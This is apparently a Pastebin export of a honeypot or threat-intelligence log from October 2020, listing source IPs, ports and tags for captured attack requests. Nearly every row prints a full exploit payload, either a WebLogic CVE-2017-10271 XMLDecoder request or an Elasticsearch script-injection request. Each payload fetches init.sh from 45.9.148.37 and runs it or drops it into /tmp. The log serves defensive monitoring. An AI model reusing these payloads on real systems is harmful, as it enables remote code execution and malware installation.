API tools faq
paste
internetweather

Payload: 45.9.148.37

internetweather
Oct 27th, 2020
753
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.47 KB | None | 0 0
raw download clone embed print report
  1. Source IP Country User Agent Payload POST Data Target Port Bad Packets® Tags Date First Seen Date Last Seen Event Count
  2. 123.56.107.140 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-27T16:16:37Z 2020-10-27T16:16:37Z 1
  3. 122.51.241.15 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-27T12:27:48Z 2020-10-27T12:27:48Z 1
  4. 122.51.241.15 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-27T12:27:47Z 2020-10-27T12:27:47Z 1
  5. 120.78.2.189 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7002 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-27T06:47:56Z 2020-10-27T06:47:56Z 1
  6. 120.78.2.189 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-27T06:47:53Z 2020-10-27T06:47:53Z 1
  7. 212.129.153.225 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-27T06:45:45Z 2020-10-27T06:45:45Z 1
  8. 212.129.153.225 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-27T06:45:42Z 2020-10-27T06:45:42Z 1
  9. 67.216.214.51 United States Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-26T06:36:10Z 2020-10-26T06:36:10Z 1
  10. 119.3.184.210 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/b2f628fff19fda999999999/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-25T00:41:05Z 2020-10-25T00:41:05Z 1
  11. 119.3.184.210 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cd1 -fsSL http://45.9.148.37/b2f628fff19fda999999999/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-25T00:41:03Z 2020-10-25T00:41:03Z 1
  12. 119.45.11.28 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-24T05:06:43Z 2020-10-24T05:06:43Z 1
  13. 103.26.77.84 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-23T21:30:46Z 2020-10-23T21:30:46Z 1
  14. 103.26.77.84 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-23T21:30:46Z 2020-10-23T21:30:46Z 1
  15. 39.107.138.233 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-22T20:27:46Z 2020-10-22T20:27:46Z 1
  16. 106.12.21.27 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-22T11:37:09Z 2020-10-22T11:37:09Z 1
  17. 139.155.41.161 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7002 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-21T12:37:31Z 2020-10-21T12:37:31Z 1
  18. 139.155.41.161 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-21T12:37:28Z 2020-10-21T12:37:28Z 1
  19. 45.79.50.100 United States Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-21T07:01:27Z 2020-10-21T07:01:27Z 1
  20. 45.79.50.100 United States Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-21T07:01:26Z 2020-10-21T07:01:26Z 1
  21. 153.126.180.38 Japan Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-20T22:55:58Z 2020-10-20T22:55:58Z 1
  22. 153.126.180.38 Japan Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-20T22:55:54Z 2020-10-20T22:55:54Z 1
  23. 39.99.129.254 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-20T12:51:11Z 2020-10-20T12:51:11Z 1
  24. 120.53.124.104 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-20T04:35:05Z 2020-10-20T04:35:05Z 1
  25. 120.53.124.104 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-20T04:35:00Z 2020-10-20T04:35:00Z 1
  26. 202.120.164.93 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-19T19:35:27Z 2020-10-19T19:35:27Z 1
  27. 202.120.164.93 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T19:35:15Z 2020-10-19T19:35:15Z 1
  28. 111.231.207.163 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-19T18:57:05Z 2020-10-19T18:57:05Z 1
  29. 111.231.207.163 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T18:57:01Z 2020-10-19T18:57:01Z 1
  30. 47.94.230.59 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7002 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T18:17:35Z 2020-10-19T18:17:35Z 1
  31. 47.94.230.59 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T18:17:34Z 2020-10-19T18:17:34Z 1
  32. 47.105.217.49 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T17:20:40Z 2020-10-19T17:20:40Z 1
  33. 42.194.142.186 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T17:08:23Z 2020-10-19T17:08:23Z 1
  34. 42.194.142.186 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-19T17:08:14Z 2020-10-19T17:08:14Z 1
  35. 183.57.157.106 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T16:58:00Z 2020-10-19T16:58:00Z 1
  36. 120.53.229.36 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-19T16:17:34Z 2020-10-19T16:17:34Z 1
  37.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!